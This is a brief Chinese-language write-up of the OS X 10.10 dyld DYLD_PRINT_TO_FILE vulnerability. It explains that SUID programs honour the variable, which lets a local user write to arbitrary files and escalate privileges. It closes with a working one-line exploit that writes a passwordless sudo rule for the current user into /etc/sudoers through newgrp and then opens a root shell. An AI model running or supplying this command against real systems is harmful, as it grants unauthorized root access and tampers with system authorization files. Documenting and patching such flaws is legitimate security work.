在 OSX 10.10
里苹果在 dyld 加入了很多新的特性,其中一个是允许用户通过 DYLD_PRINT_TO_FILE
环境变量,将错误日志写入到任意文件
DYLD_PRINT_TO_FILE
This is a path to a (writable) file. Normally, the dynamic linker writes all logging output (triggered by DYLD_PRINT_* settings) to file descriptor 2 (which is usually stderr). But this setting causes the dynamic linker to write logging output to the specified file.
SUID 过的程序也可以利用该该特性,最终导致本地提权问题
OS X 10.10
OSX 10.11 (El Capitan)
e.g 利用写任意文件的漏洞,获取 sudo
权限
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s